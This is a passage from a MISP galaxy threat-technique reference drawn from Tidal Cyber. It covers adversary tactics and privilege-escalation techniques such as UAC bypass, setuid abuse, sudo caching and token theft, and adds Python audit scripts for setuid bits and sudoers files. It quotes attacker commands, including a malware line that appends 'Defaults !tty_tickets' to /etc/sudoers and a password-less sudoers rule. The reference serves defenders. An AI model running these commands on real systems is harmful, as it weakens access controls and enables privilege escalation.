These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.

The tag is: misp-galaxy:tactic="Privilege Escalation"

Defense Evasion

The adversary is trying to avoid being detected.

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

The tag is: misp-galaxy:tactic="Defense Evasion"

Credential Access

The adversary is trying to steal account names and passwords.

Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.

The tag is: misp-galaxy:tactic="Credential Access"

Discovery

The adversary is trying to figure out your environment.

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.

The tag is: misp-galaxy:tactic="Discovery"

Lateral Movement

The adversary is trying to move through your environment.

Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.

The tag is: misp-galaxy:tactic="Lateral Movement"

Collection

The adversary is trying to gather data of interest to their goal.

Collection consists of techniques adversaries may use to gather information, and the sources that information is collected from, that are relevant to following through on the adversary’s objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.

The tag is: misp-galaxy:tactic="Collection"

Command and Control

The adversary is trying to communicate with compromised systems to control them.

Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.

The tag is: misp-galaxy:tactic="Command and Control"

Exfiltration

The adversary is trying to steal data.

Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.

The tag is: misp-galaxy:tactic="Exfiltration"

Impact

The adversary is trying to manipulate, interrupt, or destroy your systems and data.

Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.

The tag is: misp-galaxy:tactic="Impact"

Tidal Technique

Tidal Technique Cluster.

Tidal Technique is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

Bypass User Account Control

Adversaries may bypass UAC mechanisms to elevate process privileges on a system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt, or allowing them to enter an administrator password to complete the action.<sup>[[TechNet How UAC Works](https://app.tidalcyber.com/references/bbf8d1a3-115e-4bc8-be43-47ce3b295d45)]</sup>

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) objects without prompting the user through the UAC notification box.<sup>[[TechNet Inside UAC](https://app.tidalcyber.com/references/dea47af6-677a-4625-8664-adf0e6839c9f)]</sup><sup>[[MSDN COM Elevation](https://app.tidalcyber.com/references/898df7c7-4f19-40cb-a216-7b0f6c6155b3)]</sup> An example of this is use of [Rundll32](https://app.tidalcyber.com/technique/5652575d-cdb9-44ef-9c32-fff038f15444) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.<sup>[[Davidson Windows](https://app.tidalcyber.com/references/49af01f2-06c5-4b21-9882-901ad828ee28)]</sup>

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods<sup>[[Github UACMe](https://app.tidalcyber.com/references/7006d59d-3b61-4030-a680-5dac52133722)]</sup> that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.<sup>[[SANS UAC Bypass](https://app.tidalcyber.com/references/824739ac-633a-40e0-bb01-2bfd43714d67)]</sup>

The tag is: misp-galaxy:technique="Bypass User Account Control"

Elevated Execution with Prompt

Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.<sup>[[AppleDocs AuthorizationExecuteWithPrivileges](https://app.tidalcyber.com/references/7b8875e8-5b93-4d49-a12b-2683bab2ba6e)]</sup> The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.

Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.<sup>[[Death by 1000 installers; it’s all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)]</sup><sup>[[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)]</sup><sup>[[OSX Coldroot RAT](https://app.tidalcyber.com/references/5ee3a92c-df33-4ecd-b21e-7b9a4f6de227)]</sup> This technique may be combined with [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to trick the user into granting escalated privileges to malicious code.<sup>[[Death by 1000 installers; it’s all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)]</sup><sup>[[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)]</sup> This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.<sup>[[Death by 1000 installers; it’s all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)]</sup>

The tag is: misp-galaxy:technique="Elevated Execution with Prompt"

Setuid and Setgid

An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.<sup>[[setuid man page](https://app.tidalcyber.com/references/c07e9d6c-18f2-4246-a265-9bec7d833bba)]</sup> Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.

Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://app.tidalcyber.com/technique/5c6687f6-3539-4268-a6a4-2b98fdeac0fb)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.

Adversaries can use this mechanism on their own malware to make sure they’re able to execute in elevated contexts in the future.<sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup> This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.

Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8)). The setuid and setgid bits are indicated with an "s" instead of an "x" when viewing a file’s attributes via <code>ls -l</code>. The <code>find</code> command can also be used to search for such files. For example, <code>find / -perm +4000 2>/dev/null</code> can be used to find files with setuid set and <code>find / -perm +2000 2>/dev/null</code> may be used for setgid. Binaries that have these bits set may then be abused by adversaries.<sup>[[GTFOBins Suid](https://app.tidalcyber.com/references/0b7d8e81-da8e-4f6a-a1b7-4ed81e441b4d)]</sup>
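
The following is an added defender-side example, not code from the MISP galaxy or the Tidal Cyber cluster: it reads the setuid/setgid bits described above from numeric modes and from <code>ls -l</code> mode strings, then audits a constructed inventory of paths and modes against a known-good baseline, flagging a world-writable <code>4777</code> binary and any privileged binary the baseline does not list.

```python
"""Audit file modes for setuid/setgid bits (added example; inventory,
modes and baseline below are constructed, not taken from a real host)."""
import stat

# Constructed stand-in for os.lstat(path).st_mode results.
SAMPLE_INVENTORY = {
    "/usr/bin/passwd":     0o104755,  # setuid root, expected
    "/usr/bin/sudo":       0o104755,  # setuid root, expected
    "/usr/bin/wall":       0o102755,  # setgid (tty group), expected
    "/tmp/.cache/helper":  0o104777,  # setuid AND world-writable (chmod 4777 from the text)
    "/home/user1/bin/run": 0o102775,  # setgid, group-writable, not in baseline
    "/usr/bin/ls":         0o100755,  # ordinary executable, no special bits
}

# Known-good setuid/setgid binaries for this host (would come from a golden image).
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/wall"}


def special_bits(mode: int) -> set:
    """Return the special bits ("setuid", "setgid") present in a numeric mode."""
    bits = set()
    if mode & stat.S_ISUID:
        bits.add("setuid")
    if mode & stat.S_ISGID:
        bits.add("setgid")
    return bits


def parse_ls_mode(text: str) -> set:
    """Recover the special bits from an ls -l mode string such as -rwsr-xr-x.

    An 's' in the owner execute slot means setuid with execute, 'S' setuid
    without execute; the same letters in the group execute slot mean setgid."""
    if len(text) != 10:
        raise ValueError("expected a 10-character ls -l mode string")
    bits = set()
    if text[3] in "sS":
        bits.add("setuid")
    if text[6] in "sS":
        bits.add("setgid")
    return bits


def audit(inventory: dict, baseline: set) -> list:
    """Classify every setuid/setgid entry.

    Returns (path, ls-style mode, sorted bits, verdict) tuples; files without
    special bits are skipped because they cannot change the caller's identity."""
    findings = []
    for path, mode in sorted(inventory.items()):
        bits = special_bits(mode)
        if not bits:
            continue
        if mode & stat.S_IWOTH:
            verdict = "critical: world-writable privileged binary"
        elif path not in baseline:
            verdict = "unexpected: not in baseline"
        elif mode & stat.S_IWGRP:
            verdict = "review: group-writable"
        else:
            verdict = "expected"
        findings.append((path, stat.filemode(mode), sorted(bits), verdict))
    return findings


if __name__ == "__main__":
    for path, fm, bits, verdict in audit(SAMPLE_INVENTORY, BASELINE):
        print(f"{fm} {path:22} {'+'.join(bits):13} {verdict}")
```

On a live host the inventory would be built from <code>os.lstat()</code> over the filesystem and the baseline from a trusted image; the classification logic stays the same.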

The tag is: misp-galaxy:technique="Setuid and Setgid"

Sudo and Sudo Caching

Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.

Within Linux and macOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."<sup>[[sudo man page 2018](https://app.tidalcyber.com/references/659d4302-d4cf-41af-8007-aa1da0208aa0)]</sup> Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code>, which is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code>.<sup>[[OSX.Dok Malware](https://app.tidalcyber.com/references/71d65081-dada-4a69-94c5-f1d8e4e151c1)]</sup> Elevated privileges are required to edit this file though.

Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user’s password. For example, <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user’s password. Additionally, if <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.

In the wild, malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo 'Defaults !tty_tickets' >> /etc/sudoers</code>.<sup>[[cybereason osx proton](https://app.tidalcyber.com/references/9c43d646-9ac2-43b5-80b6-9e69dcb57617)]</sup> In order for this change to be reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.
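
As an added example (not code from the MISP galaxy or the Tidal Cyber cluster), the audit below parses sudoers content for the three weak settings this entry describes: <code>NOPASSWD</code> rules, a <code>Defaults !tty_tickets</code> line, and a <code>timestamp_timeout</code> longer than sudo's default of five minutes (or negative, which disables expiry). The sudoers text is constructed; only the user-spec and <code>Defaults</code> syntax is handled, not aliases or <code>#include</code> directives.

```python
"""Flag sudoers settings that let a cached or password-less sudo be abused.
Added example; SAMPLE_SUDOERS is constructed and mirrors the lines quoted
in the technique text."""
import re
from dataclasses import dataclass, field

DEFAULT_TIMEOUT_MINUTES = 5  # sudo's compiled-in default for timestamp_timeout

SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample, not from a real host)
Defaults        env_reset
Defaults        timestamp_timeout=60
Defaults        !tty_tickets
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
user1   ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""

_ALIAS_KEYWORDS = {"User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias", "Cmd_Alias"}
_DEFAULTS_RE = re.compile(r"^Defaults(?:[:@>!]\S+)?\s+(.+)$")
# user  host = (runas) command-list
_USER_SPEC_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")


@dataclass
class SudoersFindings:
    nopasswd_all: list = field(default_factory=list)   # users who run anything without a password
    nopasswd_cmds: dict = field(default_factory=dict)  # user -> password-less commands
    tty_tickets: bool = True                           # default on (macOS Sierra and later, modern sudo)
    timestamp_timeout: int = DEFAULT_TIMEOUT_MINUTES   # minutes; negative means never expire


def _logical_lines(text: str):
    """Join backslash-continued lines and drop comments and blank lines."""
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            yield line


def parse_sudoers(text: str) -> SudoersFindings:
    f = SudoersFindings()
    for line in _logical_lines(text):
        m = _DEFAULTS_RE.match(line)
        if m:
            for opt in (o.strip() for o in m.group(1).split(",")):
                if opt == "!tty_tickets":
                    f.tty_tickets = False
                elif opt == "tty_tickets":
                    f.tty_tickets = True
                elif opt.startswith("timestamp_timeout="):
                    f.timestamp_timeout = int(float(opt.split("=", 1)[1]))
            continue
        if line.split()[0] in _ALIAS_KEYWORDS:
            continue
        m = _USER_SPEC_RE.match(line)
        if not m:
            continue
        user, _host, _runas, cmnd_spec = m.groups()
        nopasswd = False  # a tag applies to every following command until changed
        for entry in (e.strip() for e in cmnd_spec.split(",")):
            # Tags such as NOPASSWD:, PASSWD:, SETENV: prefix the command.
            while ":" in entry and entry.split(":", 1)[0].isupper():
                tag, entry = (part.strip() for part in entry.split(":", 1))
                if tag == "NOPASSWD":
                    nopasswd = True
                elif tag == "PASSWD":
                    nopasswd = False
            if nopasswd:
                if entry == "ALL":
                    f.nopasswd_all.append(user)
                else:
                    f.nopasswd_cmds.setdefault(user, []).append(entry)
    return f


def risk_summary(f: SudoersFindings) -> list:
    """Human-readable list of the weak settings found; empty means nothing flagged."""
    issues = []
    for user in f.nopasswd_all:
        issues.append(f"{user}: NOPASSWD for ALL commands (no password ever required)")
    for user, cmds in f.nopasswd_cmds.items():
        issues.append(f"{user}: NOPASSWD for {', '.join(cmds)}")
    if not f.tty_tickets:
        issues.append("tty_tickets disabled: a cached credential is valid from any terminal")
    if f.timestamp_timeout < 0:
        issues.append("timestamp_timeout negative: cached credentials never expire")
    elif f.timestamp_timeout > DEFAULT_TIMEOUT_MINUTES:
        issues.append(f"timestamp_timeout={f.timestamp_timeout} minutes exceeds the default of {DEFAULT_TIMEOUT_MINUTES}")
    return issues


if __name__ == "__main__":
    for issue in risk_summary(parse_sudoers(SAMPLE_SUDOERS)):
        print(issue)
```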

The tag is: misp-galaxy:technique="Sudo and Sudo Caching"

Temporary Elevated Cloud Access

Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.

Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.<sup>[[Google Cloud Just in Time Access 2023](https://app.tidalcyber.com/references/797c6051-9dff-531b-8438-d306bdf46720)]</sup><sup>[[Azure Just in Time Access 2023](https://app.tidalcyber.com/references/ee35e13f-ca39-5faf-81ae-230d33329a28)]</sup>

Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the iam.serviceAccountTokenCreator role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.<sup>[[Google Cloud Service Account Authentication Roles](https://app.tidalcyber.com/references/525a8afc-64e9-5cc3-9c56-95da9811da0d)]</sup> In Exchange Online, the ApplicationImpersonation role allows a service account to use the permissions associated with specified user accounts.<sup>[[Microsoft Impersonation and EWS in Exchange](https://app.tidalcyber.com/references/d7755dbd-0b38-5776-b63a-d792a4d027a4)]</sup>

Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role’s access — for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the PassRole permission can allow a service they create to assume a given role, while in GCP, users with the iam.serviceAccountUser role can attach a service account to a resource.<sup>[[AWS PassRole](https://app.tidalcyber.com/references/01e0c198-dd59-5dd1-b632-73cb316eafe0)]</sup><sup>[[Google Cloud Service Account Authentication Roles](https://app.tidalcyber.com/references/525a8afc-64e9-5cc3-9c56-95da9811da0d)]</sup>

While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.<sup>[[Rhino Google Cloud Privilege Escalation](https://app.tidalcyber.com/references/55173e12-9edc-5685-ac0b-acd51617cc6e)]</sup><sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup>

Note: this technique is distinct from [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.<sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup>

The tag is: misp-galaxy:technique="Temporary Elevated Cloud Access"

Abuse Elevation Control Mechanism

Adversaries may circumvent mechanisms designed to control elevated privileges in order to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit the actions a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that are considered higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

The tag is: misp-galaxy:technique="Abuse Elevation Control Mechanism"

Create Process with Token

Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.<sup>[[Microsoft RunAs](https://app.tidalcyber.com/references/af05c12e-f9c6-421a-9a5d-0797c01ab2dc)]</sup>

Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) or created via [Make and Impersonate Token](https://app.tidalcyber.com/technique/561da0ae-4ebc-4356-a954-338249cac31a) before being used to create a process.

While this technique is distinct from [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.

The tag is: misp-galaxy:technique="Create Process with Token"

Make and Impersonate Token

Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system, the adversary can create a logon session for the user using the LogonUser function. The function will return a copy of the new session’s access token, and the adversary can use SetThreadToken to assign the token to a thread.

This behavior is distinct from [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) in that this refers to creating a new user token instead of stealing or duplicating an existing one.

The tag is: misp-galaxy:technique="Make and Impersonate Token"

Parent PID Spoofing

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.<sup>[[DidierStevens SelectMyParent Nov 2009](https://app.tidalcyber.com/references/1fee31b0-2d9c-4c02-b494-d3a6b80f12f3)]</sup> This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.<sup>[[Microsoft UAC Nov 2018](https://app.tidalcyber.com/references/abda4184-18f9-4799-9c1f-3ba484473e35)]</sup>

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde)/[Rundll32](https://app.tidalcyber.com/technique/5652575d-cdb9-44ef-9c32-fff038f15444) to be <code>explorer.exe</code> rather than an Office document delivered as part of Spearphishing Attachment.<sup>[[CounterCept PPID Spoofing Dec 2018](https://app.tidalcyber.com/references/a1fdb8db-4c5f-4fb9-a013-b232cd8471f8)]</sup> This spoofing could be executed via [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) within a malicious Office document or any code that can perform Native API calls.<sup>[[CTD PPID Spoofing Macro Mar 2019](https://app.tidalcyber.com/references/b06b72ba-dbd6-4190-941a-0cdd3d659ab6)]</sup><sup>[[CounterCept PPID Spoofing Dec 2018](https://app.tidalcyber.com/references/a1fdb8db-4c5f-4fb9-a013-b232cd8471f8)]</sup>

Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.<sup>[[XPNSec PPID Nov 2017](https://app.tidalcyber.com/references/0dbf093e-4b54-4972-b048-2a6411037da4)]</sup>

The tag is: misp-galaxy:technique="Parent PID Spoofing"

SID-History Injection

Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens.<sup>[[Microsoft SID](https://app.tidalcyber.com/references/c921c476-741e-4b49-8f94-752984adbba5)]</sup> An account can hold additional SIDs in the SID-History Active Directory attribute,<sup>[[Microsoft SID-History Attribute](https://app.tidalcyber.com/references/32150673-5593-4a2c-9872-aaa96a21aa5c)]</sup> allowing interoperable account migration between domains (e.g., all values in SID-History are included in access tokens).

With Domain Administrator (or equivalent) rights, harvested or well-known SID values <sup>[[Microsoft Well Known SIDs Jun 2017](https://app.tidalcyber.com/references/14b344ed-bde6-4755-b59a-595edb23a210)]</sup> may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1), [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd), or [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b).

The tag is: misp-galaxy:technique="SID-History Injection"

Token Impersonation/Theft

Adversaries may duplicate then impersonate another user’s existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using DuplicateToken or DuplicateTokenEx. The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user’s security context, or with SetThreadToken to assign the impersonated token to a thread.

An adversary may perform [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://app.tidalcyber.com/technique/ef0e0599-6543-499d-8409-ef449da5c38a) using CreateProcessWithTokenW or CreateProcessAsUserW. [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) is also distinct from [Make and Impersonate Token](https://app.tidalcyber.com/technique/561da0ae-4ebc-4356-a954-338249cac31a) in that it refers to duplicating an existing token, rather than creating a new one.

The tag is: misp-galaxy:technique="Token Impersonation/Theft"

Access Token Manipulation

Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.

An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These tokens can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7)) or used to spawn a new process (i.e. [Create Process with Token](https://app.tidalcyber.com/technique/ef0e0599-6543-499d-8409-ef449da5c38a)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.<sup>[[Pentestlab Token Manipulation](https://app.tidalcyber.com/references/243deb44-4d47-4c41-bd5d-262c4319cce5)]</sup>

Any standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.

The tag is: misp-galaxy:technique="Access Token Manipulation"

Account Access Removal

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to set malicious changes into place.<sup>[[CarbonBlack LockerGoga 2019](https://app.tidalcyber.com/references/9970063c-6df7-4638-a247-6b1102289372)]</sup><sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup>

In Windows, the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility and the <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets may be used by adversaries to modify user accounts. In Linux, the <code>passwd</code> utility may be used to change passwords. Accounts could also be disabled by Group Policy.

Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) objective.

The tag is: misp-galaxy:technique="Account Access Removal"

Cloud Account - Duplicate

Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.

